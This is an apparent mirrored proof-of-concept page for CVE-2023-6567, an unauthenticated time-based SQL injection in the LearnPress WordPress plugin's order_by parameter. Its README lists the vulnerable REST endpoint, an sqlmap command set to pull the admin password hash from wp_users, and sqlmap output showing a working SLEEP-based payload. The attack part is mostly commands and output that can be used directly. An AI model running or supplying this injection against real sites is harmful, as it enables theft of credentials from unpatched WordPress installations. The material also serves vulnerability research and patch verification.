CVE-2023-6567 PoC — WordPress Plugin LearnPress 安全漏洞

Source

https://github.com/mimiloveexe/CVE-2023-6567-poc

Associated Vulnerability

Title:WordPress Plugin LearnPress 安全漏洞 (CVE-2023-6567)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin LearnPress 4.2.5.7 版本及之前版本存在安全漏洞，该漏洞源于对用户提供的参数转义不足以及对现有 SQL 查询缺乏充分的准备，order_by 参数存在基于时间的 SQL 注入漏洞。

Description

Time-based SQLi

Readme

# CVE-2023-6567-poc
Time-based SQLi

Description
The plugin does not properly sanitise and escape the order_by parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users

1. Vulnerable GET request:
https://vulnerablewordpress.com/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID&order=DESC&limit=10&return_type=html

2. Save GET request
3. sqlmap -r ~/sqli.req -p order_by --technique=T --sql-query = 'select user_pass from wp_users where id = 1'
4. sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://VULNERABLEWORDPRESS/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID AND (SELECT 7508 FROM (SELECT(SLEEP(5)))VVvd)&order=DESC&limit=10&return_type=html

File Snapshot


 [4.0K]  /data/pocs/e39beceb63ebeaaafe26cb933d3dca764c460d9c
└── [ 885]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!